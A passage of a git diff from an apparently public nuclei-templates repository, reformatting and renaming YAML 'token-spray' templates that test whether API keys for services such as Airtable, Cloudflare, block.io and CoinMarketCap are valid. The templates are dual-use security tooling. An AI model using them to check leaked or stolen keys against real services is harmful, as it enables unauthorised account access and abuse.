https://www.abstractapi.com/api/website-screenshot-api - https://github.com/daffainfo/all-about-apikey/tree/main/abstract-website-screenshot + metadata: + max-request: 1 tags: token-spray,abstractapi self-contained: true -requests: + +http: - method: GET path: - "https://screenshot.abstractapi.com/v1/?api_key={{token}}&url=https://test.test" @@ -22,4 +25,6 @@ requests: words: - '"code":"validation_error"' - 'Reached error page' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a00473045022100db8ffedc82ceed3165a9935d94b47b7fd1bdfd2a219d03a563a2bf6f82856a0002202e0a9484e954b9d78c96c9ef18a194e75134384a7306354d87f767486946e7e7:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-abstractapi.yaml b/nuclei-templates/Other/api-abstractapi-383.yaml similarity index 100% rename from nuclei-templates/Other/api-abstractapi.yaml rename to nuclei-templates/Other/api-abstractapi-383.yaml diff --git a/nuclei-templates/Other/api-adafruit-io-387.yaml b/nuclei-templates/Other/api-adafruit-io.yaml similarity index 100% rename from nuclei-templates/Other/api-adafruit-io-387.yaml rename to nuclei-templates/Other/api-adafruit-io.yaml diff --git a/nuclei-templates/Other/api-airtable.yaml b/nuclei-templates/Other/api-airtable.yaml index d076f34909..bfbf6e513e 100644 --- a/nuclei-templates/Other/api-airtable.yaml +++ b/nuclei-templates/Other/api-airtable.yaml @@ -8,10 +8,13 @@ info: reference: - https://airtable.com/api - https://github.com/daffainfo/all-about-apikey/tree/main/airtable + metadata: + max-request: 1 tags: token-spray,airtable self-contained: true -requests: + +http: - raw: - | GET https://api.airtable.com/v0/meta/bases HTTP/1.1 @@ -26,3 +29,5 @@ requests: - '"id"' - '"name"' condition: and + +# digest: 4a0a00473045022037017dfc3410f15453f95b4fbf4b9126ce14acf4f41502974ba693818b7c68f4022100d96c96c74aa56e3bb52af0f3823fc162ce9eb8709dd481726ca1b131e36dc7bc:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-alienvault-390.yaml b/nuclei-templates/Other/api-alienvault-390.yaml deleted file mode 100644 index d0e5ba33ae..0000000000 --- a/nuclei-templates/Other/api-alienvault-390.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-alienvault - -info: - name: AlienVault Open Threat Exchange (OTX) API Test - author: daffainfo - severity: info - reference: - - https://otx.alienvault.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md - tags: token-spray,alienvault,exchange - -self-contained: true -requests: - - raw: - - | - GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 - Host: otx.alienvault.com - X-OTX-API-KEY: {{token}} - - matchers: - - type: word - part: body - words: - - '"$schema":' - - '"properties":' - condition: and diff --git a/nuclei-templates/Other/api-alienvault.yaml b/nuclei-templates/Other/api-alienvault.yaml new file mode 100644 index 0000000000..254c5be20d --- /dev/null +++ b/nuclei-templates/Other/api-alienvault.yaml @@ -0,0 +1,26 @@ +id: api-alienvault + +info: + name: AlienVault Open Threat Exchange (OTX) API Test + author: daffainfo + severity: info + reference: + - https://otx.alienvault.com/api + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AlienVault%20Open%20Threat%20Exchange.md + tags: token-spray,alienvault,exchange + +self-contained: true +requests: + - raw: + - | + GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 + Host: otx.alienvault.com + X-OTX-API-KEY: {{token}} + + matchers: + - type: word + part: body + words: + - '"$schema":' + - '"properties":' + condition: and diff --git a/nuclei-templates/Other/api-amdoren.yaml b/nuclei-templates/Other/api-amdoren.yaml index 340716effe..ff4d13cbcb 100644 --- a/nuclei-templates/Other/api-amdoren.yaml +++ b/nuclei-templates/Other/api-amdoren.yaml @@ -4,13 +4,17 @@ info: name: Amdoren API Test author: daffainfo severity: info + description: Free currency API with over 150 currencies reference: - https://www.amdoren.com/currency-api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/Amdoren.md + - https://github.com/daffainfo/all-about-apikey/tree/main/amdoren + metadata: + max-request: 1 tags: token-spray,amdoren self-contained: true -requests: + +http: - method: GET path: - "https://www.amdoren.com/api/currency.php?api_key={{token}}&from=USD&to=EUR" @@ -22,3 +26,5 @@ requests: - '"error" : 0' - '"error_message" : "-"' condition: and + +# digest: 4a0a00473045022100bdf87830726285bcb4bb2fb3ae2964d072871eeff969ca898c65ebdfd702075802205c12a0dc34b647a423391b198a0ecb9dcbfd44262db51daf9742af924cf391a0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-api2convert.yaml b/nuclei-templates/Other/api-api2convert.yaml index 64abcff5c5..2be77905f1 100644 --- a/nuclei-templates/Other/api-api2convert.yaml +++ b/nuclei-templates/Other/api-api2convert.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.api2convert.com/docs/index.html - https://github.com/daffainfo/all-about-apikey/tree/main/api2convert + metadata: + max-request: 1 tags: token-spray,api2convert self-contained: true -requests: + +http: - raw: - | POST https://api.api2convert.com/v2/jobs HTTP/1.1 @@ -37,3 +40,5 @@ requests: - '"token"' - '"type"' condition: and + +# digest: 4b0a00483046022100ad6fcfc4c3f8ae88a73430167ac9af70a074277ed29ea41313921acc8f12aa62022100b84cc947d12787d907d869c110821565537722e25f4b5f083fd400bbd1d0ce3e:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-apiflash.yaml b/nuclei-templates/Other/api-apiflash.yaml index 60df0ee264..1a7ff58e22 100644 --- a/nuclei-templates/Other/api-apiflash.yaml +++ b/nuclei-templates/Other/api-apiflash.yaml @@ -8,10 +8,13 @@ info: reference: - https://apiflash.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/apiflash + metadata: + max-request: 1 tags: token-spray,apiflash self-contained: true -requests: + +http: - method: GET path: - "https://api.apiflash.com/v1/urltoimage?access_key={{token}}&url=https://selfcontained.test" @@ -21,3 +24,5 @@ requests: part: body words: - 'net::ERR_NAME_NOT_RESOLVED at https://selfcontained.test' + +# digest: 4a0a00473045022100caa67506ea44b9839f21072292c6cffd95081230a7d165338ac04d8cb9e197dd02207c6b474673af8d85d63a3d1b8bf6fb0556b2881109b21aca2aa738a1488e4a03:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-asana-393.yaml b/nuclei-templates/Other/api-asana-393.yaml new file mode 100644 index 0000000000..6e3e815e2c --- /dev/null +++ b/nuclei-templates/Other/api-asana-393.yaml @@ -0,0 +1,18 @@ +id: api-asana +info: + name: Asana API Test + author: zzeitlin + reference: https://developers.asana.com/docs/using-terminal + severity: info + tags: token-spray,asana +requests: + - method: GET + path: + - "https://app.asana.com/api/1.0/users/me" + headers: + Authorization: Bearer {{token}} + matchers: + - type: status + status: + - 401 + negative: true diff --git a/nuclei-templates/Other/api-asana.yaml b/nuclei-templates/Other/api-asana.yaml deleted file mode 100644 index 9608f3c236..0000000000 --- a/nuclei-templates/Other/api-asana.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-asana - -info: - name: Asana API Test - author: zzeitlin - reference: https://developers.asana.com/docs/using-terminal - severity: info - tags: token-spray,asana - -self-contained: true -requests: - - method: GET - path: - - "https://app.asana.com/api/1.0/users/me" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'data:' - - 'email' - - 'name' - condition: and diff --git a/nuclei-templates/Other/api-binaryedge.yaml b/nuclei-templates/Other/api-binaryedge.yaml index 43b39ba396..f19c46dfe8 100644 --- a/nuclei-templates/Other/api-binaryedge.yaml +++ b/nuclei-templates/Other/api-binaryedge.yaml @@ -9,16 +9,19 @@ info: reference: - https://binaryedge.io - https://docs.binaryedge.io - tags: dns,scan,recon,binaryedge,token-spray + metadata: + max-request: 1 + tags: recon,binaryedge,token-spray self-contained: true -requests: + +http: - method: GET path: - https://api.binaryedge.io/v2/user/subscription + headers: X-Key: "{{token}}" - matchers: - type: word part: body @@ -26,3 +29,5 @@ requests: - '"subscription"' - '"requests_left"' condition: and + +# digest: 4a0a00473045022100b8633708514218ce499d8e9dee966792e63396c036cba04c6fe7f9dff7b8f53902205a763ac3f2d63d5e3b45aeb8ff9e1d54b8ee79e334dcf14cbea504f74ef142bc:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-bingmaps-395.yaml b/nuclei-templates/Other/api-bingmaps-395.yaml deleted file mode 100644 index 0892d85b9f..0000000000 --- a/nuclei-templates/Other/api-bingmaps-395.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-bingmaps - -info: - name: Bing Maps API Test - author: zzeitlin - reference: https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address - severity: info - tags: token-spray,bing,maps,bingmaps - -requests: - - method: GET - path: - - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" - - matchers: - - type: word - part: body - words: - - 'ValidCredentials' diff --git a/nuclei-templates/Other/api-bingmaps.yaml b/nuclei-templates/Other/api-bingmaps.yaml new file mode 100644 index 0000000000..f9b7269bc9 --- /dev/null +++ b/nuclei-templates/Other/api-bingmaps.yaml @@ -0,0 +1,16 @@ +id: api-bingmaps +info: + name: Bing Maps API Test + author: zzeitlin + reference: https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address + severity: info + tags: token-spray,bing,maps,bingmaps +requests: + - method: GET + path: + - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" + matchers: + - type: word + part: body + words: + - 'ValidCredentials' diff --git a/nuclei-templates/Other/api-blitapp.yaml b/nuclei-templates/Other/api-blitapp.yaml index 29222cc6d2..87ffa67898 100644 --- a/nuclei-templates/Other/api-blitapp.yaml +++ b/nuclei-templates/Other/api-blitapp.yaml @@ -8,10 +8,13 @@ info: reference: - https://blitapp.com/api/ - https://github.com/daffainfo/all-about-apikey/tree/main/blitapp + metadata: + max-request: 1 tags: token-spray,blitapp self-contained: true -requests: + +http: - raw: - | GET https://blitapp.com/api/scheduledcapture HTTP/1.1 @@ -27,3 +30,5 @@ requests: - '"name"' - '"apps"' condition: and + +# digest: 490a00463044022038435a915b0077f4cca8d919f84aff4860fac82d7377272c33cfb4e6f8e6b6d702202b2fbfcbcc6b4bc1f414a11bcf7d2c6052fea60f5b0eeffcaa5804ce1a1a7010:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-block-400.yaml b/nuclei-templates/Other/api-block-400.yaml new file mode 100644 index 0000000000..2de9ea1703 --- /dev/null +++ b/nuclei-templates/Other/api-block-400.yaml @@ -0,0 +1,25 @@ +id: api-block + +info: + name: block.io API Test + author: daffainfo + severity: info + reference: + - https://block.io/docs/basic + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Block.md + tags: token-spray,block + +self-contained: true +requests: + - method: GET + path: + - "https://block.io/api/v2/get_balance/?api_key={{token}}" + + matchers: + - type: word + part: body + words: + - '"network"' + - '"available_balance"' + - '"pending_received_balance"' + condition: and diff --git a/nuclei-templates/Other/api-block.yaml b/nuclei-templates/Other/api-block.yaml deleted file mode 100644 index 616a67dd9f..0000000000 --- a/nuclei-templates/Other/api-block.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-block - -info: - name: block.io API Test - author: daffainfo - severity: info - description: Bitcoin Payment, Wallet & Transaction Data - reference: - - https://block.io/docs/basic - - https://github.com/daffainfo/all-about-apikey/tree/main/block - tags: token-spray,block - -self-contained: true -requests: - - method: GET - path: - - "https://block.io/api/v2/get_balance/?api_key={{token}}" - - matchers: - - type: word - part: body - words: - - '"network"' - - '"available_balance"' - - '"pending_received_balance"' - condition: and diff --git a/nuclei-templates/Other/api-blockchain-398.yaml b/nuclei-templates/Other/api-blockchain-398.yaml index 4f027d84d3..afa9207f6c 100644 --- a/nuclei-templates/Other/api-blockchain-398.yaml +++ b/nuclei-templates/Other/api-blockchain-398.yaml @@ -1,13 +1,17 @@ id: api-blockchain info: - name: Blockhain API Test + name: Blockchain API Test author: daffainfo severity: info reference: - https://api.blockchain.com/v3/#/ - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md tags: token-spray,blockchain + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 self-contained: true requests: @@ -25,3 +29,5 @@ requests: - '"balance"' - '"available"' condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/Other/api-browshot.yaml b/nuclei-templates/Other/api-browshot.yaml index 7d882d928f..45a6d0f8ac 100644 --- a/nuclei-templates/Other/api-browshot.yaml +++ b/nuclei-templates/Other/api-browshot.yaml @@ -8,10 +8,13 @@ info: reference: - https://browshot.com/api/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/browshot + metadata: + max-request: 1 tags: token-spray,browshot self-contained: true -requests: + +http: - method: GET path: - "https://api.browshot.com/api/v1/simple?url=http://mobilito.net/&instance_id=12&width=640&height=480&key={{token}}" @@ -24,3 +27,5 @@ requests: - '"priority"' - '"url"' condition: and + +# digest: 490a00463044022007d1b5a388dc96ef04fb6224f495336a5ca8fdd6ec9d18d7a134f18ec0aacbc102203065a60bb755e2f42f6e493ea813e7c4a1b988e7772b64770a4f45f105b441ff:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-c99.yaml b/nuclei-templates/Other/api-c99.yaml index 0ca60b0740..2dbd20f0ec 100644 --- a/nuclei-templates/Other/api-c99.yaml +++ b/nuclei-templates/Other/api-c99.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://api.c99.nl - tags: c99,api,dns,token-spray + metadata: + max-request: 1 + tags: c99,api,token-spray self-contained: true -requests: + +http: - method: GET path: - https://api.c99.nl/ping?key={{token}}&host=1.1.1.1 @@ -19,3 +22,5 @@ requests: part: body words: - "PING 1.1.1.1" + +# digest: 490a00463044022056cd5552c0ec71d3dad9958b0c6072da4f9238f6cf9754a22caa50ad957dd47002207994331d6222068f5f418ec5fab63453f960f34a2d6a1e10fa4af1f079237f51:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-calendly-404.yaml b/nuclei-templates/Other/api-calendly-404.yaml new file mode 100644 index 0000000000..648bfea8b1 --- /dev/null +++ b/nuclei-templates/Other/api-calendly-404.yaml @@ -0,0 +1,17 @@ +id: api-calendly +info: + name: Calendly API Test + author: zzeitlin + reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me + severity: info + tags: token-spray,calendly +requests: + - method: GET + path: + - "https://calendly.com/api/v1/users/me" + headers: + X-Token: "{{token}}" + matchers: + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/api-calendly.yaml b/nuclei-templates/Other/api-calendly.yaml deleted file mode 100644 index 10a8e83478..0000000000 --- a/nuclei-templates/Other/api-calendly.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-calendly - -info: - name: Calendly API Test - author: zzeitlin - reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me - severity: info - tags: token-spray,calendly - -self-contained: true -requests: - - method: GET - path: - - "https://calendly.com/api/v1/users/me" - headers: - X-Token: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"data":' - - '"id":' - - '"email":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-chaos.yaml b/nuclei-templates/Other/api-chaos.yaml index 6619833d61..79f76caac1 100644 --- a/nuclei-templates/Other/api-chaos.yaml +++ b/nuclei-templates/Other/api-chaos.yaml @@ -6,16 +6,19 @@ info: severity: info reference: - https://chaos.projectdiscovery.io/#/docs - tags: dns,recon,chaos,token-spray,projectdiscovery + metadata: + max-request: 1 + tags: recon,chaos,token-spray,projectdiscovery self-contained: true -requests: + +http: - method: GET path: - "https://dns.projectdiscovery.io/dns/projectdiscovery.io" + headers: Authorization: "{{token}}" - matchers: - type: word part: body @@ -23,3 +26,5 @@ requests: - '"domain":' - '"subdomains":' condition: and + +# digest: 490a0046304402207bac5b21229f3071f4a0a4328d4b976e44514b4a7114bb26fcbfe41c22fa9f71022025946480d750d697f68c14d15080c9441176b1f85c25c262bdb82f858a5e41eb:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-clearbit-407.yaml b/nuclei-templates/Other/api-clearbit-407.yaml deleted file mode 100644 index cece51d861..0000000000 --- a/nuclei-templates/Other/api-clearbit-407.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-clearbit - -info: - name: Clearbit API Test - author: daffainfo - severity: info - reference: - - https://clearbit.com/docs - - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Clearbit.md - tags: token-spray,clearbit - -self-contained: true -requests: - - raw: - - | - GET https://person.clearbit.com/v2/combined/find?email=alex@clearbit.com HTTP/1.1 - Authorization: Basic {{base64(token + ':')}} - Host: person.clearbit.com - - matchers: - - type: word - part: body - words: - - '"person":' - - '"id":' - - '"name":' - condition: and diff --git a/nuclei-templates/Other/api-clearbit.yaml b/nuclei-templates/Other/api-clearbit.yaml new file mode 100644 index 0000000000..fc8cf9c9ea --- /dev/null +++ b/nuclei-templates/Other/api-clearbit.yaml @@ -0,0 +1,28 @@ +id: api-clearbit + +info: + name: Clearbit API Test + author: daffainfo + severity: info + description: Search for company logos and embed them in your projects + reference: + - https://clearbit.com/docs + - https://github.com/daffainfo/all-about-apikey/tree/main/clearbit + tags: token-spray,clearbit + +self-contained: true +requests: + - raw: + - | + GET https://person.clearbit.com/v2/combined/find?email=alex@clearbit.com HTTP/1.1 + Authorization: Basic {{base64(token + ':')}} + Host: person.clearbit.com + + matchers: + - type: word + part: body + words: + - '"person":' + - '"id":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-clickup.yaml b/nuclei-templates/Other/api-clickup.yaml index 56524ada27..7383b5168e 100644 --- a/nuclei-templates/Other/api-clickup.yaml +++ b/nuclei-templates/Other/api-clickup.yaml @@ -8,10 +8,13 @@ info: reference: - https://clickup.com/api - https://github.com/daffainfo/all-about-apikey/tree/main/clickup + metadata: + max-request: 1 tags: token-spray,clickup self-contained: true -requests: + +http: - raw: - | GET https://api.clickup.com/api/v2/user HTTP/1.1 @@ -26,3 +29,5 @@ requests: - '"username":' - '"email":' condition: and + +# digest: 4a0a0047304502207b81cd3bfdce3521aebecfee691dfca17cbc3a58c3ac673cbd13469bf07879d4022100c86c4310b8e946cdf4994f423f14677c61efd5030943c66d8e6e89d649fb0f8e:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-clockify.yaml b/nuclei-templates/Other/api-clockify.yaml index 3fc3c22ceb..c9b106b538 100644 --- a/nuclei-templates/Other/api-clockify.yaml +++ b/nuclei-templates/Other/api-clockify.yaml @@ -8,10 +8,13 @@ info: reference: - https://clockify.me/developers-api - https://github.com/daffainfo/all-about-apikey/tree/main/clockify + metadata: + max-request: 1 tags: token-spray,clockify self-contained: true -requests: + +http: - raw: - | GET https://api.clockify.me/api/v1/user HTTP/1.1 @@ -27,3 +30,5 @@ requests: - '"email":' - '"name":' condition: and + +# digest: 4a0a004730450221008e7f991b307ddcb8b49287eb2361e0cb9d4e3c50608458ae422bf1d51647b43602205e29d04c3149340dcfebc19bf35ae9f24950dcd85de1a73bc1e0bfa31cfe6233:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-cloudconvert.yaml b/nuclei-templates/Other/api-cloudconvert.yaml index d9dec21d91..19e55e4007 100644 --- a/nuclei-templates/Other/api-cloudconvert.yaml +++ b/nuclei-templates/Other/api-cloudconvert.yaml @@ -8,10 +8,13 @@ info: reference: - https://cloudconvert.com/api/v2 - https://github.com/daffainfo/all-about-apikey/tree/main/cloudconvert + metadata: + max-request: 1 tags: token-spray,cloudconvert self-contained: true -requests: + +http: - raw: - | GET https://api.cloudconvert.com/v2/tasks HTTP/1.1 @@ -25,3 +28,5 @@ requests: - '"data":' - '"id":' condition: and + +# digest: 4b0a00483046022100a6956ea28ef86d116576b382d1b29f94b13de90bd565fee36c9a9e5580520775022100fe7294714d97b26786292d9b104c677ddc921694bf79800f2af2ff2156fc7039:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-cloudflare.yaml b/nuclei-templates/Other/api-cloudflare.yaml index 9e65ce5251..d1e16361f1 100644 --- a/nuclei-templates/Other/api-cloudflare.yaml +++ b/nuclei-templates/Other/api-cloudflare.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://dash.cloudflare.com/profile/api-tokens + metadata: + max-request: 1 tags: token-spray,cloudflare self-contained: true -requests: + +http: - raw: - | GET https://api.cloudflare.com/client/v4/user/tokens/verify HTTP/1.1 @@ -22,3 +25,5 @@ requests: part: body words: - 'This API Token is valid and active' + +# digest: 4a0a00473045022100f874f0d5f3b6163d67a19d36c8790348c48c79767c7e87e4e71ca3226bbfa7e80220715e0a4b78d4a119954edcbc81ba94fae5f7c8f0ce3bb675ad774fa8e3b1dd63:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-codestats.yaml b/nuclei-templates/Other/api-codestats.yaml index 187bbb9d79..b0c73d631e 100644 --- a/nuclei-templates/Other/api-codestats.yaml +++ b/nuclei-templates/Other/api-codestats.yaml @@ -8,10 +8,13 @@ info: reference: - https://codestats.net/api-docs - https://github.com/daffainfo/all-about-apikey/tree/main/codestats + metadata: + max-request: 1 tags: token-spray,codestats self-contained: true -requests: + +http: - raw: - | POST https://codestats.net/api/my/pulses HTTP/1.1 @@ -32,3 +35,5 @@ requests: part: body words: - '"Great success!"' + +# digest: 4b0a00483046022100e43297cf4a87a86b76c1e936f41eed084eea8a903cd431158894657559fa8e81022100cfd89d2407870e297e8050fef0177e7ca76e4805ebd55be4afe87f9169daf28c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-coinmarketcap.yaml b/nuclei-templates/Other/api-coinmarketcap.yaml index 3fa6d702c7..a7651387fe 100644 --- a/nuclei-templates/Other/api-coinmarketcap.yaml +++ b/nuclei-templates/Other/api-coinmarketcap.yaml @@ -4,13 +4,17 @@ info: name: CoinMarketCap API Test author: daffainfo severity: info + description: Cryptocurrencies Prices reference: - https://coinmarketcap.com/api/documentation/v1 - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinMarketCap.md + - https://github.com/daffainfo/all-about-apikey/tree/main/coinmarketcap + metadata: + max-request: 1 tags: token-spray,coinmarketcap self-contained: true -requests: + +http: - raw: - | GET https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest HTTP/1.1 @@ -25,3 +29,5 @@ requests: - '"symbol"' - '"cmc_rank"' condition: and + +# digest: 4b0a00483046022100e853728243b56db54ee87b9277b7ec9994bcbb7fd9415f71ded19a7f8006eba9022100deb18ad5c34d2d1eacfb4b8bdc85e2b8b8049ea24d1ee9863e3a6ab9d24a7e1c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-coinranking.yaml b/nuclei-templates/Other/api-coinranking.yaml index 66bcd4d92f..0c9378c21a 100644 --- a/nuclei-templates/Other/api-coinranking.yaml +++ b/nuclei-templates/Other/api-coinranking.yaml @@ -4,13 +4,17 @@ info: name: Coinranking API Test author: daffainfo severity: info + description: Live Cryptocurrency data reference: - https://developers.coinranking.com/api/documentation - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Coinranking.md + - https://github.com/daffainfo/all-about-apikey/tree/main/coinranking + metadata: + max-request: 1 tags: token-spray,coinranking self-contained: true -requests: + +http: - raw: - | GET https://api.coinranking.com/v2/exchanges HTTP/1.1 @@ -25,3 +29,5 @@ requests: - '"coinrankingUrl"' - '"uuid"' condition: and + +# digest: 4a0a00473045022100f99a0fa5d0c7f4ca48d284f1b6bba481a77b104ba7ec484ea8bec09d00ffdf230220254dbe17cc7d8cd49419450a5917137ff2d96a27439efa377d200c218b0d5466:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-cooperhewitt-411.yaml b/nuclei-templates/Other/api-cooperhewitt-409.yaml similarity index 100% rename from nuclei-templates/Other/api-cooperhewitt-411.yaml rename to nuclei-templates/Other/api-cooperhewitt-409.yaml diff --git a/nuclei-templates/Other/api-craftmypdf.yaml b/nuclei-templates/Other/api-craftmypdf.yaml index 5093bbe9ff..d74982be22 100644 --- a/nuclei-templates/Other/api-craftmypdf.yaml +++ b/nuclei-templates/Other/api-craftmypdf.yaml @@ -8,10 +8,13 @@ info: reference: - https://pdflayer.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/craftmypdf + metadata: + max-request: 1 tags: token-spray,craftmypdf self-contained: true -requests: + +http: - raw: - | GET https://api.craftmypdf.com/v1/list-templates?limit=300&offset=0 HTTP/1.1 @@ -26,3 +29,5 @@ requests: - '"template_id":' - '"name":' condition: and + +# digest: 490a004630440220540310182df1fafcfa289b4e06a781a5f2285de23503fdc711783f1ea613994a0220403015028df606a19c774b161958bc222da7e77cde74276356593af1219f1f43:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-currencyfreaks.yaml b/nuclei-templates/Other/api-currencyfreaks.yaml index cfaf6d04ae..b505b3d6ed 100644 --- a/nuclei-templates/Other/api-currencyfreaks.yaml +++ b/nuclei-templates/Other/api-currencyfreaks.yaml @@ -8,10 +8,13 @@ info: reference: - https://currencyfreaks.com/documentation.html - https://github.com/daffainfo/all-about-apikey/tree/main/currencyfreaks + metadata: + max-request: 1 tags: token-spray,currencyfreaks self-contained: true -requests: + +http: - method: GET path: - "https://api.currencyfreaks.com/latest?apikey={{token}}" @@ -24,3 +27,5 @@ requests: - '"base"' - '"rates"' condition: and + +# digest: 4a0a00473045022100d4fcb9072555b2150c171057bf9fb26ca331937cb2f794d98e569ecd6c7af5b802203da7720152beebc0bd626a426a6394e957ceea376d5bc4cd3e4a704c73457e64:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-currencylayer.yaml b/nuclei-templates/Other/api-currencylayer.yaml index a844182a19..21ade05226 100644 --- a/nuclei-templates/Other/api-currencylayer.yaml +++ b/nuclei-templates/Other/api-currencylayer.yaml @@ -8,10 +8,13 @@ info: reference: - https://currencylayer.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/currencylayer + metadata: + max-request: 1 tags: token-spray,currencylayer self-contained: true -requests: + +http: - method: GET path: - "http://api.currencylayer.com/live?access_key={{token}}" @@ -24,3 +27,5 @@ requests: - '"source"' - '"quotes"' condition: and + +# digest: 4b0a00483046022100820e0350a914990da93957e4244a2652237edfd6d2941ce963a4a00a7ba601f0022100b155461a694a16024e2baf6156787055d3169371a041e455bebeb0800a7be995:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-currencyscoop.yaml b/nuclei-templates/Other/api-currencyscoop.yaml index c0f8bc8258..401b293563 100644 --- a/nuclei-templates/Other/api-currencyscoop.yaml +++ b/nuclei-templates/Other/api-currencyscoop.yaml @@ -8,10 +8,13 @@ info: reference: - https://currencyscoop.com/api-documentation - https://github.com/daffainfo/all-about-apikey/tree/main/currencyscoop + metadata: + max-request: 1 tags: token-spray,currencyscoop self-contained: true -requests: + +http: - method: GET path: - "https://api.currencyscoop.com/v1/historical?api_key={{token}}&date=2022-01-01" @@ -24,3 +27,5 @@ requests: - '"base"' - '"rates"' condition: and + +# digest: 4a0a00473045022100a251b998395360e281200f5c4083c3634c6953d4d692c2926164fa3f97bf3b390220594bfd8b5953b879fc8e4e7e9d5b243db8158227e7b745170784e0e9627aa420:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-debounce-414.yaml b/nuclei-templates/Other/api-debounce-414.yaml deleted file mode 100644 index 2c1aef9552..0000000000 --- a/nuclei-templates/Other/api-debounce-414.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-debounce - -info: - name: DeBounce API Test - author: 0ri2N - severity: info - reference: - - https://developers.debounce.io/reference/api-key-authentication - - https://debounce.io - tags: debounce,token-spray - -self-contained: true -requests: - - method: GET - path: - - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh" - - matchers: - - type: word - part: body - words: - - '"balance":' - - '"success":' - - '"debounce":' - condition: and diff --git a/nuclei-templates/Other/api-debounce.yaml b/nuclei-templates/Other/api-debounce.yaml new file mode 100644 index 0000000000..2ed95d091b --- /dev/null +++ b/nuclei-templates/Other/api-debounce.yaml @@ -0,0 +1,25 @@ +id: api-debounce + +info: + name: DeBounce API Test + author: 0ri2N + severity: info + reference: + - https://developers.debounce.io/reference/api-key-authentication + - https://debounce.io + tags: debounce,token-spray + +self-contained: true +requests: + - method: GET + path: + - "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" + + matchers: + - type: word + part: body + words: + - '"balance":' + - '"success":' + - '"debounce":' + condition: and diff --git a/nuclei-templates/Other/api-deviantart.yaml b/nuclei-templates/Other/api-deviantart.yaml new file mode 100644 index 0000000000..b09e9acd2b --- /dev/null +++ b/nuclei-templates/Other/api-deviantart.yaml @@ -0,0 +1,21 @@ +id: api-deviantart + +info: + name: DeviantArt API Test + author: zzeitlin + severity: info + reference: https://www.deviantart.com/developers/authentication + tags: token-spray,deviantart + +self-contained: true +requests: + - method: POST + path: + - "https://www.deviantart.com/api/v1/oauth2/placebo" + body: "access_token={{token}}" + + matchers: + - type: word + part: body + words: + - '"status" : "success"' diff --git a/nuclei-templates/Other/api-digitalocean.yaml b/nuclei-templates/Other/api-digitalocean.yaml index d2909d4863..5b6743c467 100644 --- a/nuclei-templates/Other/api-digitalocean.yaml 